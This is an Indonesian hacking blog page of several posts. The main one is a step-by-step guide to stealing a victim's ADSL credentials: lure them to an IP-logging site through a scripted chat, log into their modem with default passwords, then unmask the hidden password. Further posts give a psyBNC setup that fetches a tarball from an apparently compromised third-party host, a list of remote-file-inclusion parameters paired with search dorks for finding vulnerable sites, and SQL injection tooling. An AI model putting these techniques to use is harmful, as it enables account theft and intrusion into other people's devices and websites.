Sunday 24 January 2010

Hacking Modem Speedy dan Penanganannya


Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D
Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.
Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :


Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )
Website dengan log system flat file ( diambil dari artikelnya Anggi J. )
Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )
Internet Password Asterisk Reveal
( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )


Langkah Pertama
Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.


Langkah Ke Dua
Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :


Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???
Sang_korban : apaan tuh ?
Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.
Sang_korban : coba, gw liat dulu. # kena!!
Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U


Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.
Contoh IP yang sudah dilog dalam flat file,


Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)  | URL: / | Referrer: | Proxy:  | Koneksi:

Langkah Ketiga
Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.



Penanganan
Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te --> bentuk lain dari ilmuwebsite


Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.
Default password untuk setiap modem :
http://www.elitehackers.info/defaultpasslist.php



Sumber :  http://www.ilmuwebsite.com/detil_hacking/13/Hacking_Modem_Speedy_dan_Penanganannya/

Tutorial Eggdrop

Eggdrop adalah IRC bot yang paling populer, paling banyak kegunaannya, dan merupakan software paling bagus untuk BOT. Software eggdrop dapat diambil/download dengan bebas. Eggdrop fleksibel dalam strukture user file, dapat diakses lewat dcc chat, dan Eggdrop bisa di link antara satu dengan yang lainnya, sehingga para usernya bisa saling berbicara di 'partyline/botnet'. Untuk pengembangannya dibutuhkan TCL scripts dan banyak sekali website yang menyediakannya atau anda bisa membuat sendiri.

contoh tcl :: download di (sini)

Secara umum "Eggdrop" bisa di sebut sebagai BOT, silakan anda download Files eggdrop di (sini)

Menginstall Eggdrop
Ambil source eggdrop contohnya (eggdrop1.6.4.tar.gz) di mana saja anda suka.
Ada dua cara dalam mengambil files :
1. Dengan telnet gunakan perintah : wget http://chrisna.biz/eggdrop1.6.4.tar.gz
2. Dengan menggunakan WS_FTP atau CuteFtp and bisa upload file tersebut.

Setelah file tersedia di shell baru anda melakukan exstrac files / Tar dengan cara :
a. gunzip eggdrop.1.6.4.tar.gz
b. tar -zxvf eggdrop1.6.4.tar.gz

Masuk ke direktori eggdrop anda , dengan cara cd nama-dir-eggdrop-anda
ketik :
./configure
make config
make
make install
setelah semua di lakukan anda bisa mulai melakukan editing (jangan lupa folder eggdrop anda).

Mengedit config file
Rename file eggdrop.conf.dist dianjurkan sesuai nick botnya
Set irc server dan channel anda.
Listen port 3333 ganti dengan port yg telah di sediakan antara 8000 - 65536

Set Chanel :
channel add #Anet-Hub {
set global-flood-chan 5:10
set global-flood-deop 3:10
set global-flood-ctcp 3:10
set global-flood-kick 5:10
set global-flood-join 5:10
}

Set Server :
set servers {
irc.telkom.net.id
irc.incaf.net
aloha.us.indocafe.org
irc.interaksi.co
.id
}


contoh config :: download di (sini)
disunting dari :: www.chrisna.biz



Tutorial psyBNC

Langkah² membuat PsyBnc

-- upload di sini ato wget http://www.chemsteel.co.kr/bbs/bro.tar.gz
-- rm -rf bro.tar.gz
-- cd /bra/.psy;
-- ./config 2010;-----------> port ubah sesuai keinginan
-- ./fuck;./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:ssstt
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 2010
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
# usage:


buka mirc, setting identd bebas, nick bebas
ketik /server www.target.com 2010



TCL BOT



TCL adalah scripts untuk eggdrop, yang
berfungsi menambah kegunaan BOT, baik sebagai penjaga channel, bot game
atau bahkan untuk flood.
Protection TCL. Kumpulan TCL yang berfungsi untuk melindungi channel. Terdiri dari : – Anti capslock – Anti repeat text – Anti bad words – Anti bad nick / ident – Anti colour text Klik di  sini untuk download.
Identify TCL. Yaitu TCL yang berfungsi agar BOT langsung identify nick-nya ke Nickserv apabila ada notice dari Nickserv. Jika anda chat di irc.allnetwork.org bisa download di  sini.
TCL identify untuk DALnet bisa klik di  sini.
Control TCL. TCL ini berfungsi untuk memerintah bot dalam channel, baik untuk op,
deop, voice, devoice, kick atau kickban user, dll. Sebelum menggunakan
TCL ini anda harus auth kepada bot dengan password anda, misal “/msg
Bot auth password”. Klik di  sini untuk download.
Advertise TCL. TCL untuk mengirim informasi/advertise ke channel tiap X menit. Bisa juga dipakai sebagai anti idle bot. Klik di sini untuk download.
Ping TCL. TCL ini berfungsi untuk mengetahui berapa lama LAG anda / user terhadap irc server. Klik di sini untuk download.
Seen TCL. TCL ini untuk merekam nick yang masuk kedalam channel dan dapat melihat nick tersebut ada atau tidak di channel. Hasil “seen” TCL ini berbahasa indonesia. Klik di sini
untuk download.
Unload / Load TCL. TCL ini untuk me-load atau unload TCL melalui DCC chat bot, sehingga anda tidak perlu mengedit config eggdrop. Klik di sini untuk download.
TCL games. Klik di sini untuk download.
FunPing.TCL. Klik di sini untuk download.
DNS.TCL. Klik di sini untuk download.
Cerewet.TCL. Klik di sini untuk download.
Badnick.tcl. Klik di sini untuk download.



mIRC


mIRC merupakan klien Internet Relay Chat yang digunakan oleh jutaan orang, dan ribuan organisasi untuk berkomunikasi, berbagi, bermain dan bekerja dengan satu sama lain pada jaringan IRC di seluruh dunia. Internet melayani masyarakat selama lebih dari satu dekade, mIRC telah berkembang menjadi kuat, dapat diandalkan dan menyenangkan bagian dari teknologi.

Anda dapat mendownload mIRC di sini.
DOWNLOAD MIRC


Setelah anda Download, silahkan anda bergabung pada server :
- DALNET ( INTERNATIONAL dan pengguna server dalnet banyak diminati oleh chatter Indonesia )
- ALLNET ( NATIONAL dan pengguna server ini juga banyak digunakan oleh Chatter mancanegara )



LIST SERVER DALNET

Beberapa server yang sering dipakai :
irc.dal.net
redemption.ix.us.dal.net
matrix.dal.net
mesra.dal.net
swiftco.wa.us.dal.net
punch.dal.net
tranquility.hub.dal.net
dan lain-lain...

LIST SERVER ALLNET

Beberapa server yang sering dipakai :
irc.plasa.com
boleh.id.allnetwork.org
telkomnet.id.allnetwork.org
hotspeed.sg.allnetwork.org
indonet.id.allnetwork.org
dan lain-lain...

Kedua Server Diatas bisa anda gunakan Port 6667.



 

Saturday 23 January 2010

Bugs & Dorks


become_editor.php?theme_path= become_editor.php
bad_link.php?theme_path= bad_link.php
webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini= webmail/lib/emailreader_execute_on_each_page.inc.php
mantis/login_page.php?g_meta_include_file= mantis/login_page.php
/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= “index.php?name=PNphpBB2?
/index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Forgotten your password?”+”No account yet?”
/plugins/safehtml/HTMLSax3.php?dir[plugins]= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+
redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]= “/index.php?article_id=8″ “/index.php?article_id=8″
/bookmark4u/lostpasswd.php?env[include_prefix]= “bookmark4u”
?custompluginfile[]= “index.php?categoryid=1″
?view=page&pagename= “Buy, sell, trade, date, events… post anything”
modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= “topgroupname”
/cms/system/openengine.php?oe_classpath= “/cms/website.php?
/popup.php?path= “erstellt mit PHPKIT”
/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “includes/mambo.php” *fr*
/bbs//skin/zero_vote/ask_password.php?dir= “zeroboard”+”zboard”+”board”+”bbs” *.kr
index.php?go= inurl:”index.php?go=”
/stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
protection.php?action=logout&siteurl= PHPFanBase
/kboard.php?

Thursday 21 January 2010

SQL INJECTION SCHEMAFUZZ

SQL Injection mungkin bukan kata yang aneh lagi bagi para orang yang suka hacking khususnya website, Sebelumnya artikel ini ditujukan untuk anda yang tau tentang perintah SQL walaupun dikit. Oke lanjut kli ini kita akan mencoba teknik SQL Injection menggunakkan python code yaitu schemafuzz.py untuk download silahkan Klik Disini. Ingat karena ini merupakan python code jadi kita perlu menginstall python untuk menjalankannya untuk download program python silahkan langsung ke website python.org atau Klik disini, silahkan sesuaikan dengan sistem Operasi yang anda pakai.


Schemafuzz.py dibuat dengan menggunakan bahasa python oleh ahlul aryana aji dari situs darkc0de
tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

SQL INJECTION

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

MEMEHAMI PENGERTIAN ISTILAH HACKER DAN CRACKER

Dalam dunia keamanan jaringan, kedua istilah di atas bukanlah hal yang asing dan terdengar aneh. Bahkan kedua kelompok inilah yang banyak mempengaruhi kondisi keaman jaringan, sehingga oleh sebagian orang ada yang menyebut mereka sebagai “pengendali” keamanan dunia maya. Namun ternyata tidak banyak dari Kita yang dapat memahami pengertian, karakteristik, dan perbedaan dari kedua istilah di atas.

Sesungguhnya Hacker dan Cracker adalah dua istilah yang memiliki makna sangat berbeda. Namun oleh kebanyakan orang, kedua kelompok yang berperan sangat penting dalam keamanan dunia maya ini sering disalahartikan sehingga mereka seolah-olah sama dan merugikan. Jika kita mencoba menelaah dan mencari letak perbedaan antara Hacker dan Cracker, maka akan terlihat bahwa ternyata mereka memiliki tujuan yang sangat berbeda dalam melakukan aksinya. Oleh karena itu, agar kesalahan pengertian dari kedua istilah tersebut tidak berangsur-angsur, marilah kita mencoba memahami arti dan perbedaan dari kedua istilah tersebut.

SEJARAH HACKER

Terminologi peretas muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.